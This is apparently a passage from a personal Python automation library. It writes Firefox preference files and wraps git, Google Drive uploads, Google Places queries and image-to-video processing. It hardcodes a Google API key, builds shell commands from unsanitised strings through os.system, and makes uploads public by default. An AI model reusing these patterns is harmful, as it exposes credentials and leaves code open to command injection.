"d0b0a17d-ddae-9c44-bb41-7cfca103ccd5");\nuser_pref("security.sandbox.plugin.tempDirSuffix", "9ad5aae9-5dc2-ac4f-9263-0195647a6ab7");\nuser_pref("services.blocklist.addons.checked", 1550635565);\nuser_pref("services.blocklist.onecrl.checked", 1550635565);\nuser_pref("services.blocklist.plugins.checked", 1550635565);\nuser_pref("services.settings.clock_skew_seconds", -145);\nuser_pref("services.settings.last_update_seconds", 1550635565);\nuser_pref("services.settings.main.language-dictionaries.last_check", 1550635565);\nuser_pref("services.settings.main.onboarding.last_check", 1550635565);\nuser_pref("services.settings.main.sites-classification.last_check", 1550635565);\nuser_pref("services.sync.clients.lastSync", "0");\nuser_pref("services.sync.clients.lastSyncLocal", "0");\nuser_pref("services.sync.declinedEngines", "");\nuser_pref("services.sync.engine.addresses.available", true);\nuser_pref("services.sync.globalScore", 0);\nuser_pref("services.sync.migrated", true);\nuser_pref("services.sync.nextSync", 0);\nuser_pref("services.sync.tabs.lastSync", "0");\nuser_pref("services.sync.tabs.lastSyncLocal", "0");\nuser_pref("signon.importedFromSqlite", true);\nuser_pref("toolkit.startup.last_success", 1550635390);\nuser_pref("toolkit.telemetry.cachedClientID", "c0ffeec0-ffee-c0ff-eec0-ffeec0ffeec0");\nuser_pref("toolkit.telemetry.previousBuildID", "20190211233335");\nuser_pref("toolkit.telemetry.reportingpolicy.firstRun", false);\n')
open(Join("/", GLOBAL_FIREFOX_PROFILE_PATH, R, "prefs.js"), "w").write('// Mozilla User Preferences\n\n// DO NOT EDIT THIS FILE.\n//\n// If you make changes to this file while the application is running,\n// the changes will be overwritten when the application exits.\n//\n// To change a preference value, you can either:\n// - modify it via the UI (e.g. via about:config in the browser); or\n// - set it within a user.js file in your profile.\n\nuser_pref("app.normandy.first_run", false);\nuser_pref("app.normandy.user_id", "06ce59be-456c-b540-9a47-0941c6043180");\nuser_pref("app.update.auto", false);\nuser_pref("app.update.elevate.version", "66.0.3");\nuser_pref("app.update.enabled", false);\nuser_pref("app.update.lastUpdateTime.addon-background-update-timer", 1553728744);\nuser_pref("app.update.lastUpdateTime.background-update-timer", 1550635354);\nuser_pref("app.update.lastUpdateTime.blocklist-background-update-timer", 1553728915);\nuser_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1550633597);\nuser_pref("app.update.lastUpdateTime.recipe-client-addon-run", 0);\nuser_pref("app.update.lastUpdateTime.search-engine-update-timer", 1550635039);\nuser_pref("app.update.lastUpdateTime.services-settings-poll-changes", 1550635420);\nuser_pref("app.update.lastUpdateTime.telemetry_modules_ping", 0);\nuser_pref("app.update.lastUpdateTime.xpi-signature-verification", 1553729321);\nuser_pref("app.update.silent", true);\nuser_pref("app.update.url", "xxxhttps://xxxaus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VERSION%/%SYSTEM_CAPABILITIES%/%DISTRIBUTION%/%DISTRIBUTION_VERSION%/update.xml");\nuser_pref("browser.bookmarks.restore_default_bookmarks", false);\nuser_pref("browser.cache.disk.capacity", 1048576);\nuser_pref("browser.cache.disk.filesystem_reported", 1);\nuser_pref("browser.cache.disk.smart_size.first_run", false);\nuser_pref("browser.cache.disk.smart_size.use_old_max", false);\nuser_pref("browser.cache.frecency_experiment", 1);\nuser_pref("browser.contentblocking.category", "standard");\nuser_pref("browser.ctrlTab.recentlyUsedOrder", false);\nuser_pref("browser.download.importedFromSqlite", true);\nuser_pref("browser.laterrun.bookkeeping.profileCreationTime", 1550633567);\nuser_pref("browser.laterrun.bookkeeping.sessionCount", 13);\nuser_pref("browser.migrated-sync-button", true);\nuser_pref("browser.migration.version", 77);\nuser_pref("browser.newtabpage.activity-stream.asrouter.userprefs.cfr", false);\nuser_pref("browser.newtabpage.activity-stream.feeds.section.highlights", false);\nuser_pref("browser.newtabpage.activity-stream.feeds.section.topstories", false);\nuser_pref("browser.newtabpage.activity-stream.feeds.snippets", false);\nuser_pref("browser.newtabpage.activity-stream.feeds.topsites", false);\nuser_pref("browser.newtabpage.activity-stream.impressionId", "{c85341b3-f663-9243-bac9-83b8e7427423}");\nuser_pref("browser.newtabpage.activity-stream.migrationExpired", true);\nuser_pref("browser.newtabpage.activity-stream.migrationLastShownDate", 1553659200);\nuser_pref("browser.newtabpage.activity-stream.migrationRemainingDays", 2);\nuser_pref("browser.newtabpage.activity-stream.prerender", false);\nuser_pref("browser.newtabpage.activity-stream.section.highlights.includeBookmarks", false);\nuser_pref("browser.newtabpage.activity-stream.section.highlights.includeDownloads", false);\nuser_pref("browser.newtabpage.activity-stream.section.highlights.includePocket", 
false);\nuser_pref("browser.newtabpage.activity-stream.section.highlights.includeVisited", false);\nuser_pref("browser.newtabpage.activity-stream.showSearch", false);\nuser_pref("browser.newtabpage.activity-stream.showSponsored", false);\nuser_pref("browser.newtabpage.enabled", false);\nuser_pref("browser.newtabpage.enhanced", true);\nuser_pref("browser.newtabpage.storageVersion", 1);\nuser_pref("browser.pageActions.persistedActions", "{"version":1,"ids":["bookmark","bookmarkSeparator","copyURL","emailLink","addSearchEngine","sendToDevice","shareURL","pocket"],"idsInUrlbar":["pocket","bookmark"]}");\nuser_pref("browser.pagethumbnails.storage_version", 3);\nuser_pref("browser.places.smartBookmarksVersion", 7);\nuser_pref("browser.preferences.advanced.selectedTabIndex", 0);\nuser_pref("browser.preferences.defaultPerformanceSettings.enabled", false);\nuser_pref("browser.rights.3.shown", true);\nuser_pref("browser.safebrowsing.provider.google4.lastupdatetime", "1557288602301");\nuser_pref("browser.safebrowsing.provider.google4.nextupdatetime", "1557290413301");\nuser_pref("browser.safebrowsing.provider.mozilla.lastupdatetime", "1557288602720");\nuser_pref("browser.safebrowsing.provider.mozilla.nextupdatetime", "1557292202720");\nuser_pref("browser.search.cohort", "nov17-2");\nuser_pref("browser.search.countryCode", "US");\nuser_pref("browser.search.hiddenOneOffs", "Google,Bing,Amazon.com,DuckDuckGo,eBay,Twitter,Wikipedia (en)");\nuser_pref("browser.search.region", "US");\nuser_pref("browser.search.suggest.enabled", false);\nuser_pref("browser.sessionstore.upgradeBackup.latestBuildID", "20190211233335");\nuser_pref("browser.shell.checkDefaultBrowser", false);\nuser_pref("browser.shell.didSkipDefaultBrowserCheckOnFirstRun", true);\nuser_pref("browser.slowStartup.averageTime", 975);\nuser_pref("browser.slowStartup.samples", 1);\nuser_pref("browser.startup.homepage", "about:blank");\nuser_pref("browser.startup.homepage_override.buildID", "20190124174741");\nuser_pref("browser.startup.homepage_override.mstone", "65.0");\nuser_pref("browser.uiCustomization.state", "{"placements":{"widget-overflow-fixed-list":[],"nav-bar":["back-button","forward-button","stop-reload-button","home-button","customizableui-special-spring1","urlbar-container","customizableui-special-spring2","downloads-button","library-button","sidebar-button"],"TabsToolbar":["tabbrowser-tabs","new-tab-button","alltabs-button"],"PersonalToolbar":["personal-bookmarks"]},"seen":["developer-button"],"dirtyAreaCache":["nav-bar"],"currentVersion":15,"newElementCount":2}");\nuser_pref("browser.urlbar.placeholderName", "Google");\nuser_pref("browser.urlbar.searchSuggestionsChoice", false);\nuser_pref("browser.urlbar.suggest.bookmark", false);\nuser_pref("browser.urlbar.suggest.openpage", false);\nuser_pref("browser.urlbar.suggest.searches", false);\nuser_pref("browser.urlbar.timesBeforeHidingSuggestionsHint", 1);\nuser_pref("datareporting.healthreport.uploadEnabled", false);\nuser_pref("datareporting.policy.dataSubmissionPolicyAcceptedVersion", 2);\nuser_pref("datareporting.policy.dataSubmissionPolicyNotifiedTime", "1550633570624");\nuser_pref("datareporting.sessions.current.activeTicks", 7);\nuser_pref("datareporting.sessions.current.clean", true);\nuser_pref("datareporting.sessions.current.firstPaint", 664);\nuser_pref("datareporting.sessions.current.main", 73);\nuser_pref("datareporting.sessions.current.sessionRestored", 2511);\nuser_pref("datareporting.sessions.current.startTime", 
"1550633939369");\nuser_pref("datareporting.sessions.current.totalTime", 37);\nuser_pref("devtools.onboarding.telemetry.logged", true);\nuser_pref("distribution.iniFile.exists.appversion", "65.0");\nuser_pref("distribution.iniFile.exists.value", false);\nuser_pref("dom.apps.reset-permissions", true);\nuser_pref("dom.forms.autocomplete.formautofill", true);\nuser_pref("dom.mozApps.used", true);\nuser_pref("e10s.rollout.cohort", "unsupportedChannel");\nuser_pref("experiments.activeExperiment", false);\nuser_pref("extensions.blocklist.lastModified", "Tue, 26 Mar 2019 17:13:55 GMT");\nuser_pref("extensions.blocklist.pingCountVersion", -1);\nuser_pref("extensions.databaseSchema", 28);\nuser_pref("extensions.e10sBlockedByAddons", false);\nuser_pref("extensions.enabledAddons", "%7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:46.0");\nuser_pref("extensions.getAddons.cache.lastUpdate", 1553728744);\nuser_pref("extensions.getAddons.databaseSchema", 5);\nuser_pref("extensions.lastAppBuildId", "20190124174741");\nuser_pref("extensions.lastAppVersion", "65.0");\nuser_pref("extensions.lastPlatformVersion", "65.0");\nuser_pref("extensions.pendingOperations", false);\nuser_pref("extensions.webcompat.perform_injections", true);\nuser_pref("extensions.webcompat.perform_ua_overrides", true);\nuser_pref("extensions.webextensions.uuids", "{"formautofill@mozilla.org":"fd82627d-7029-df44-854c-65997238f507","screenshots@mozilla.org":"1b26d190-485a-3a41-991d-cbdbedab016b","webcompat-reporter@mozilla.org":"cdb30fdf-9916-544d-9ae5-be2506ea93c1","webcompat@mozilla.org":"f3f59ad4-5a24-054e-9a2d-8807fc628a8e"}");\nuser_pref("font.internaluseonly.changed", false);\nuser_pref("gecko.buildID", "20160421124000");\nuser_pref("gecko.mstone", "46.0");\nuser_pref("layers.acceleration.disabled", true);\nuser_pref("lightweightThemes.persisted.headerURL", false);\nuser_pref("lightweightThemes.usedThemes", "[]");\nuser_pref("media.gmp.storage.version.observed", 1);\nuser_pref("network.cookie.prefsMigrated", true);\nuser_pref("network.predictor.cleaned-up", true);\nuser_pref("pdfjs.enabledCache.state", false);\nuser_pref("pdfjs.migrationVersion", 2);\nuser_pref("pdfjs.previousHandler.alwaysAskBeforeHandling", true);\nuser_pref("pdfjs.previousHandler.preferredAction", 4);\nuser_pref("places.history.expiration.transient_current_max_pages", 112348);\nuser_pref("plugin.disable_full_page_plugin_for_types", "application/pdf");\nuser_pref("privacy.cpd.offlineApps", true);\nuser_pref("privacy.cpd.siteSettings", true);\nuser_pref("privacy.sanitize.migrateClearSavedPwdsOnExit", true);\nuser_pref("privacy.sanitize.pending", "[]");\nuser_pref("privacy.sanitize.timeSpan", 0);\nuser_pref("security.sandbox.content.tempDirSuffix", "d0b0a17d-ddae-9c44-bb41-7cfca103ccd5");\nuser_pref("security.sandbox.plugin.tempDirSuffix", "9ad5aae9-5dc2-ac4f-9263-0195647a6ab7");\nuser_pref("services.blocklist.addons.checked", 1550635565);\nuser_pref("services.blocklist.onecrl.checked", 1550635565);\nuser_pref("services.blocklist.plugins.checked", 1550635565);\nuser_pref("services.settings.clock_skew_seconds", -145);\nuser_pref("services.settings.last_update_seconds", 1550635565);\nuser_pref("services.settings.main.language-dictionaries.last_check", 1550635565);\nuser_pref("services.settings.main.onboarding.last_check", 1550635565);\nuser_pref("services.settings.main.sites-classification.last_check", 1550635565);\nuser_pref("services.sync.clients.lastSync", "0");\nuser_pref("services.sync.clients.lastSyncLocal", "0");\nuser_pref("services.sync.declinedEngines", 
"");\nuser_pref("services.sync.engine.addresses.available", true);\nuser_pref("services.sync.globalScore", 0);\nuser_pref("services.sync.migrated", true);\nuser_pref("services.sync.nextSync", 0);\nuser_pref("services.sync.tabs.lastSync", "0");\nuser_pref("services.sync.tabs.lastSyncLocal", "0");\nuser_pref("signon.importedFromSqlite", true);\nuser_pref("signon.rememberSignons", false);\nuser_pref("toolkit.startup.last_success", 1557288598);\nuser_pref("toolkit.telemetry.cachedClientID", "c0ffeec0-ffee-c0ff-eec0-ffeec0ffeec0");\nuser_pref("toolkit.telemetry.previousBuildID", "20190124174741");\nuser_pref("toolkit.telemetry.reportingpolicy.firstRun", false);\n')
Binarydata().export("places.sqlite", Join("/", GLOBAL_FIREFOX_PROFILE_PATH, R, "places.sqlite"))
class GitHub:
def get(self,url):
print("git clone %s" % url)
os.system("git clone %s" % url)
def pull(self,url):
os.system("git pull %s" % (url))
def push(self,username,repository):
os.system("git remote set-url origin 'https://%s@github.com/%s/%s.git'; git add *; git commit -m \"initial commit\"; git push origin master"%(username,username,repository))
class Google_Drive:
def __init__(self, Email_Address):
#https://developers.google.com/drive/api/v3/quickstart/python
# FIRST, EXPORT THE CREDS NO.1.
# YEAH, THEN IT JAX THAT TO NOW GET TOKEN.PICKLE!!!!
import os
ADDY = "." + "|".join([Email_Address, "Client_Secret", "GSuite"]) + ".json"
Binarydata().export(ADDY)
GDRIVE_PICKLE_ADDRESS = "." + "|".join([Email_Address, "Client_Secret_3", "GSuite"]) + ".pickle"
if GDRIVE_PICKLE_ADDRESS not in os.listdir():
if GDRIVE_PICKLE_ADDRESS in key("filename", All(Binarydata)):
Binarydata().export(GDRIVE_PICKLE_ADDRESS)
else:
1
import pickle
import os.path
from googleapiclient.discovery import build
from google_auth_oauthlib.flow import InstalledAppFlow
from google.auth.transport.requests import Request
# If modifying these scopes, delete the file GDRIVE_PICKLE_ADDRESS.
SCOPES = ['https://www.googleapis.com/auth/drive']
"""Shows basic usage of the Drive v3 API.
Prints the names and ids of the first 10 files the user has access to.
"""
creds = None
# The file GDRIVE_PICKLE_ADDRESS stores the user's access and refresh tokens, and is
# created automatically when the authorization flow completes for the first
# time.
if os.path.exists(GDRIVE_PICKLE_ADDRESS):
with open(GDRIVE_PICKLE_ADDRESS, 'rb') as token:
creds = pickle.load(token)
# If there are no (valid) credentials available, let the user log in.
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
OSA().display_dialog("A browser will open and you will be asked to log in and accept permissions to use the Google Drive API. Click OK to continue.",text_prompt=False)
flow = InstalledAppFlow.from_client_secrets_file(
ADDY, SCOPES)
creds = flow.run_local_server()
# Save the credentials for the next run
with open(GDRIVE_PICKLE_ADDRESS, 'wb') as token:
pickle.dump(creds, token)
service = build('drive', 'v3', credentials=creds)
self.service = service
# Call the Drive v3 API
results = service.files().list(
pageSize=10, fields="nextPageToken, files(id, name)").execute()
items = results.get('files', [])
if not items:
print('No files found.')
else:
print('Files:')
for item in items:
print(u'{0} ({1})'.format(item['name'], item['id']))
Binarydata().update_or_create(GDRIVE_PICKLE_ADDRESS)
Binarydata().export(GDRIVE_PICKLE_ADDRESS)
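# Usage sketch (hypothetical account / file):
#   drive = Google_Drive(Email_Address="someone@example.com")
#   url = drive.create("Report.docx", public=True)  # returns a shareable drive.google.com link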
def create(self, address, public = True):
service = self.service
ext_dict = {".doc": "application/msword",".dot": "application/msword",".docx": "application/vnd.openxmlformats-officedocument.wordprocessingml.document",".dotx": "application/vnd.openxmlformats-officedocument.wordprocessingml.template",".docm": "application/vnd.ms-word.document.macroEnabled.12",".dotm": "application/vnd.ms-word.template.macroEnabled.12",".xls": "application/vnd.ms-excel",".xlt": "application/vnd.ms-excel",".xla": "application/vnd.ms-excel",".xlsx": "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet",".xltx": "application/vnd.openxmlformats-officedocument.spreadsheetml.template",".xlsm": "application/vnd.ms-excel.sheet.macroEnabled.12",".xltm": "application/vnd.ms-excel.template.macroEnabled.12",".xlam": "application/vnd.ms-excel.addin.macroEnabled.12",".xlsb": "application/vnd.ms-excel.sheet.binary.macroEnabled.12",".ppt": "application/vnd.ms-powerpoint",".pot": "application/vnd.ms-powerpoint",".pps": "application/vnd.ms-powerpoint",".ppa": "application/vnd.ms-powerpoint",".pptx": "application/vnd.openxmlformats-officedocument.presentationml.presentation",".potx": "application/vnd.openxmlformats-officedocument.presentationml.template",".ppsx": "application/vnd.openxmlformats-officedocument.presentationml.slideshow",".ppam": "application/vnd.ms-powerpoint.addin.macroEnabled.12",".pptm": "application/vnd.ms-powerpoint.presentation.macroEnabled.12",".potm": "application/vnd.ms-powerpoint.template.macroEnabled.12",".ppsm": "application/vnd.ms-powerpoint.slideshow.macroEnabled.12",".mdb": "application/vnd.ms-access"}
ext = "." + address.split(".")[-1]
if ext not in ext_dict:
OSA.display_dialog("extension %s not in ext_dict.\n Please add it." % (ext), text_prompt = False)
import googleapiclient
media = googleapiclient.http.MediaFileUpload(address,
mimetype=ext_dict[ext],
resumable=False)
file_metadata = {
'name': address.replace("_", " "),
'mimeType': ext_dict[ext],
}
file = service.files().create(body=file_metadata,
media_body=media,
fields='id').execute()
print('File ID: %s' % file.get('id'))
ID = file.get("id")
if public == True:
service.permissions().create(body={"role":"reader", "type":"anyone"}, fileId=ID).execute()
URL = "https://drive.google.com/file/d/{}/view".format(ID)
return URL
@staticmethod
def tests():
Email_Address = a_shop().Business_Email_Address
ADDY = "." + "|".join([Email_Address, "Client_Secret", "GSuite"]) + ".json"
assert ADDY in key("filename", All(Binarydata))
R = Google_Drive(Email_Address = Email_Address)
Test_Address = "Test.docx"
text_to_docx("Test", Test_Address)
R.create(address = Test_Address, public = True)
rm("Test.docx")
class Google_Places_Search:
def google_places_search(x="40.7532616",y="-73.9839516",radius=3500,name="restaurant"):
# from https://stackoverflow.com/questions/50573658/python-google-places-api
# This covers from Houston Street to 79th St at these coordinates with radius 3500 meters
import requests
import json
APIKEY = "AIzaSyBFx8hqftDOlrSWRTiOSowjwfeS1OQtBpw"
def findPlaces(loc,radius, pagetoken = None):
lat, lng = loc
type = "restaurant"
#url = "https://maps.googleapis.com/maps/api/place/nearbysearch/json?location={lat},{lng}&radius={radius}&type={type}&key={APIKEY}{pagetoken}".format(lat = lat, lng = lng, radius = radius, type = type,APIKEY = APIKEY, pagetoken = "&pagetoken="+pagetoken if pagetoken else "")
url = "https://maps.googleapis.com/maps/api/place/nearbysearch/json?location={lat},{lng}&radius={radius}&name={name}&key={APIKEY}{pagetoken}".format(lat = lat, lng = lng, radius = radius, name = name,APIKEY = APIKEY, pagetoken = "&pagetoken="+pagetoken if pagetoken else "")
print(url)
response = requests.get(url)
res = json.loads(response.text)
# print(res)
print("here results ---->>> ", len(res["results"]))
for result in res["results"]:
info = ";".join(map(str,[result["name"],result["geometry"]["location"]["lat"],result["geometry"]["location"]["lng"],result.get("rating",0),result["place_id"]]))
print(info)
pagetoken = res.get("next_page_token",None)
print("here -->> ", pagetoken)
return pagetoken, res["results"]
# pagetoken = "CpQFhwIAADQWOcVI1wll-B869Z24El48rXw18gKoab_keD65V18zFEvPjKIfrS79Pc_vXJcZQtOuF0RObQG20ph-GE3ssP3k1fu8zsYbw5g3UPbSjAvQLdXkdD1qAWztXj7hc5Kxc4pYRyGM1_ljVOHg3Py_zSlYscnoNjCvRua2MDQgusCsEquNqGREFdvhjDkbeMhEFYxHucTnIn96OxIJEpamePTHsBooYyPBaa_ejGZ_C99QeDjpSkSKBgEe3aL1uWKlYhsGKh7biQUR5rKsKPodwccLIrW8Gr5tag3NH0sLPExHHvqzlpkj--KIuydTVjPH7u2zHxmPByServ2S5xjXYUBRr-ly3e1xPsVMhZZH9TxfttCIHLscBvpvCswIfaGYdl3bEzsrFISfpp0rpKtlp9gWGY7Tbk2n6s3etCHQEHn2qmM8bsJwkZV81pUWN0j9C9RX-ywOyIKY2yp1w_Iq1mRwOwY4mckbicOoooHiV6JER4xe7Kizw9hbXOnezn_NMk15TLwRoXlfL1s73uwogo-VWE8c-V1HqRpWQSyudRhLwhOEclrICXIdxICOgTgYO1z57xCEerw3QUL_7MPDrlbbh_AlX8I6Jfe8IhQ1Fkqu_njatm6aBTjkp2CSqlvZJpI_Lrv330VcyFEqBkGn7NJew3I9xofSrBaXFa8ABi6DXQm6-yC32OEyf7GHNXINjT1IB0yh6KR6c0qzaqiqOzKcuuai9XqEMQNNKyi6EuhzH5TP9YA56N3JhnXRFhs2aWHZhLlieVI6_uqzpZSgYjUem8aQrMTlmHw0kIYU8I-Ca041C4Zm2gMezwygRrhzsOoAmbmu96nft0KuIWTB3A_xGVKYQ2qjb2KRM7nsglnSEhDoNs8EhvuIm0FQs30YSCp5GhRO3b3Tn5rsLuwiWgu8hwEGhL0S1A"
pagetoken = None
results = []
while True:
pagetoken, results_ = findPlaces(loc=(x,y),radius=radius,pagetoken=pagetoken)
results.extend(results_)
import time
# next_page_token only becomes valid a couple of seconds after Google returns it,
# so pause before requesting the next page of results.
time.sleep(10)
if not pagetoken:
break
return results
"""
assert len(google_places_search(name="trader joes")) == 6
assert len(google_places_search(name="park")) == 0
assert len(google_places_search(name="central park")) == 3
"""
def getinfo(placeid):
APIKEY="AIzaSyBFx8hqftDOlrSWRTiOSowjwfeS1OQtBpw"
fields=["formatted_address","formatted_phone_number","opening_hours","name","rating","website"]
#url= "https://maps.googleapis.com/maps/api/place/details/json?key={}&placeid={}&fields={}".format(
# APIKEY,placeid,",".join(fields))
url= "https://maps.googleapis.com/maps/api/place/details/json?placeid={}&key={}&fields={}".format(
placeid,APIKEY,",".join(fields))
r = requests.get(url)
#return url
data = json.loads(r.text)
return data
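# Usage sketch (hypothetical place id):
#   getinfo("ChIJN1t_tDeuEmsRUsoyG83frY4")["result"]["formatted_address"]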
class Images(object):
def flexor_and_tenor(self, address, size, logo_scaling_dimension_size):
import cv2, numpy as np
pic = cv2.imread(address)
t1, t2 = pic.shape[0]*(size[0]/logo_scaling_dimension_size[0]), pic.shape[1]*(size[1]/logo_scaling_dimension_size[1])
t1, t2 = int(t1), int(t2)
pic[0:t1,0:t2,0:,] = np.array([255,255,255])
cv2.imwrite(address, pic)
return address
for i in os.listdir(homepath("~/Desktop")):
os.system("mv '/Users/$USER/Desktop/%s' '/Users/$USER/tavern/tavern/soda/dls/'"%(i))
def image_binary(self,address):
import cv2
img_grey = cv2.imread(address, cv2.IMREAD_GRAYSCALE)
img_binary = cv2.threshold(img_grey, 128, 255, cv2.THRESH_BINARY)[1]
return img_binary
def image_base64(self, address):
import base64
return base64.b64encode(open(address,"rb").read())
def vstack(self, images= ["hot.png"]*3, destination_address=None):
imgs = pool(Image.open,images).result()
widths = set(lmap(lambda i: Image.open(i).size[0],images))
print(widths)
min_shape = sorted( [(np.sum(i.size), i.size ) for i in imgs])[0][1]
x = list((np.asarray( i ) for i in imgs ))
imgs_comb = np.vstack([np.asarray(i) for i in x])
import scipy.misc
print(imgs_comb.shape)
scipy.misc.imsave(input("destination address?: ") if destination_address == None else destination_address,imgs_comb)
return destination_address
def slow_vstack(self, images, destination_address=None):
imgs = pool(Image.open,images).result()
min_shape = sorted( [(np.sum(i.size), i.size ) for i in imgs])[0][1]
arrays = pool(np.asarray,imgs).result()
jaxpel = arrays[0]
for idx,i in enum(arrays[:-1]):
try:
jaxpel = np.vstack([jaxpel, arrays[idx+1]])
redprint(idx, jaxpel.shape)
except Exception as e:
redprint("some error.")
imgs_comb = Image.fromarray( jaxpel)
imgs_comb.save(input("destination address?: ") if destination_address == None else destination_address )
return destination_address
def hstack(self, images):
import numpy as np
"""
imgs = []
import numpy as np
imgs.append(np.full((1000,100,3),255,dtype=np.uint8))
imgs.append(np.full((1000,100,3),255,dtype=np.uint8))
imgs.append(np.full((800,100,3),255,dtype=np.uint8))
import cv2
addresses = [get_random_address(homepath("~/tavern/tavern/soda/dls")).png() for i in range(3)]
for address,i in zip(addresses,imgs):
cv2.imwrite(address,i)
images = addresses
"""
imgs = pool(Image.open,images).result()
min_shape = sorted( [(np.sum(i.size), i.size ) for i in imgs])[0][1][1]
min_shape_2 = sorted( [(np.sum(i.size), i.size ) for i in imgs])[0][1][0]
max_shape = sorted( [(np.sum(i.size), i.size ) for i in imgs],reverse=True)[0][1][1]
for idx,i in enum(imgs):
if i.size[1] != max_shape:
x = cv2.imread(images[idx])
import numpy as np
new = np.full((max_shape,min_shape_2,3),0,dtype=np.uint8)
new[0:i.size[1],0:min_shape_2,] = x
cv2.imwrite(images[idx],new)
imgs = pool(Image.open,images).result()
imgs_comb = np.hstack([np.asarray(i) for i in imgs])
import scipy.misc
print(imgs_comb.shape)
destination_address = get_random_address(homepath("~/tavern/tavern/soda/dls")).png()
scipy.misc.imsave(destination_address,imgs_comb)
return destination_address
def __init__(self):
import urllib.request
from PIL import Image
from PIL import ImageEnhance, ImageFilter
import cv2
import numpy as np
from moviepy.editor import VideoFileClip
globals().update(locals())
def download(self, url="http://www.gunnerkrigg.com//comics/00000001.jpg", save_path=None):
if not save_path:
save_folder = os.path.expanduser("~/tavern/tavern/soda/dls")
os.makedirs(save_folder, exist_ok=True)
save_path = get_random_address(save_folder).jpg()
print('Saving to.. %s'%save_path)
try:
import urllib
urllib.request.urlretrieve(url, save_path)
#open(save_path,"wb").write(requests.get(url).raw)
except Exception as e:
redprint("%s, url: %s"%(e, url))
time.sleep(5)
return Images().download(url,save_path)
return save_path
def resize_disregard_proportion(self, width, height, infile, outfile):
from PIL import Image
x = Image.open(infile)
x = x.resize((width, height), Image.ANTIALIAS)
x.save(outfile)
return outfile
@staticmethod
@timeit
def images_to_video(images, width, height, framerate, outfile):
"""[Annotation] if you edit this, it doesn't look like it makes sense, but that's usual for this stuff. [assume it works]"""
from PIL import Image
import cv2
import os
"""[Hard-Add B] emitting"""
print("initiating Images().images_to_video")
print("[Emit] Verifying image_paths are Images --")
"""[Annotation] [Hard-Add A] (part of a compilation of hard-adds)"""
images = sudby(lambda i: tp(lambda:Image.open(i)), images)
"""[Annotation] here, i had to change the names to .png and do some complicated thing with blips in it """
olds, news = ["%s.png"%(".".join(i.split(".")[:-1])) for i in images], images
[Image.open(old).save(new) for old,new in zip(olds,news) if old.endswith(".png") == False and old != new] #chx4if!=png\|undeeded
images = ["%s.png"%(".".join(i.split(".")[:-1])) for i in images]
"""[Hard-Add B] emitting"""
print("[Emit] Changed all image_paths to PNG format")
print("[Emit] Resizing all images now -- ")
"""[Annotation] here, resize """
for IMAGE_FILENAME_TO_SIZE in images:
print(IMAGE_FILENAME_TO_SIZE)
x = Image.open(IMAGE_FILENAME_TO_SIZE)
x = x.resize((width, height), Image.ANTIALIAS)
x.save(IMAGE_FILENAME_TO_SIZE)
"""[Hard-Add B] emitting"""
print("[Emit] Adding images to outfile %s -- "%outfile)
"""[Annotation] here, took this code from stackoverflow; basically it makes an `out` and adds images to it."""
out = cv2.VideoWriter(outfile, cv2.VideoWriter_fourcc(*"mp4v"), framerate, (width, height))
def add_images_to_out(out, images):
for image in images:
frame = cv2.imread(image)
out.write(frame) # Write out frame to video
cv2.imshow("video",frame)
if (cv2.waitKey(1) & 0xFF) == ord("q"): # Hit `q` to exit
break
return out
add_images_to_out(out, images).release()
"""[Hard-Add B] emitting"""
print("[Emit] Video file successfully created. cv2 cleaning up --")
"""[Annotation] [No-annotation]"""
cv2.destroyAllWindows()
"""[Annotation] [No-annotation]"""
print("The output video is {}".format(outfile))
"""[Hard-Add B] emitting"""
print("[Emit] End of images_to_video --*")
return outfile
""" [A Test] \"\"\"
import os
test_photos_path = os.path.expanduser("~/Documents/photos/test")
if not os.path.exists(test_photos_path):
print("you must create a photo directory with images at ~/Documents/photos/test")
print("ending test..")
os.chdir(test_photos_path)
images_to_video(os.listdir(), 1920, 1080, 60, "out.mp4")
"""
def images_to_video2(self, images, frames_per_image = 60):
framerate = 30
# images = ["image1.jpg"]
out_location = get_random_address(homepath("~/tavern/tavern/soda/dls")).mp4()
images = sudby(lambda i: tp(lambda:Image.open(i)), images)
height, width, layers = cv2.imread(images[0]).shape  # cv2 .shape is (rows, cols, channels)
out = cv2.VideoWriter(out_location, cv2.VideoWriter_fourcc(*"mp4v"), framerate, (width, height))
images = lmap(lambda i: cv2.imread(i), images)
for i in images:
for j in range(frames_per_image):
out.write(i)
out.release()
r = VideoFileClip(out_location)
print(r.duration)
os.system("open %s"%(out_location))
return out_location
@staticmethod
def image_show(images):
# final = concatenate([VideoFileClip(clips[0]),
# VideoFileClip(clips[1]).crossfadein(0.5),
# VideoFileClip(clips[2]).crossfadein(0.5),
# ],
# padding=-1, method="compose")
frames_per_image = int(OSA.log("frames per image?"))
crossfadein = 0.5
extra_frames = int(30 * crossfadein)
frames_per_image = frames_per_image + 30 + extra_frames
# clips = [Images().images_to_video2([images[0]], frames_per_image - 30)] + lmap(lambda i: Images().images_to_video2([i], frames_per_image), images[1:])
clips = [Images().images_to_video2([images[0]], frames_per_image - extra_frames)] + lmap(lambda i: Images().images_to_video2([i], frames_per_image), images[1:])
# clips = lmap(lambda i: Images().images_to_video2([i], frames_per_image), images)
from moviepy.editor import VideoFileClip
from moviepy.editor import concatenate
# 'final = VideoFileClip(clips[0])\nfor i in clips[1:]:\n final = concatenate([final,\n VideoFileClip(i).crossfadein(0.5)],\n padding=-1, method="compose")'
final = concatenate([VideoFileClip(clips[0]),
*lmap(lambda i: VideoFileClip(i).crossfadein(crossfadein), clips[1:])],
padding=-1, method="compose")
out_location = get_random_address(homepath("~/tavern/tavern/soda/dls")).mp4()
final.write_videofile(out_location)
os.system("open '{}'".format(out_location))
return out_location
def resize(self, fn, size=1200):
if not size:
return fn
im = Image.open(fn)
import numpy as np
image_size = np.array(im.size)
# ratio = max(image_size)/size
ratio = image_size[0]/size
new_size = image_size / ratio
new_size = [int(round(i)) for i in new_size]
im = im.resize(new_size)
im.save(fn)
return fn
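# Example: a 3000x2000 input with size=1200 gives ratio = 3000/1200 = 2.5, so the image is
# saved at (1200, 800); width is forced to `size` and the aspect ratio is preserved.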
def resize_via_width(self, address, desired_width=1200):
# Always Resize The Bitch.
im = Image.open(address)
aspect_ratio = im.size[1]/im.size[0]
im = im.resize((desired_width,Integer(desired_width*aspect_ratio) ))
im.save(address)
return address
def resize_over_background(self, address, size):
img = cv2.imread(address)
size_ = size
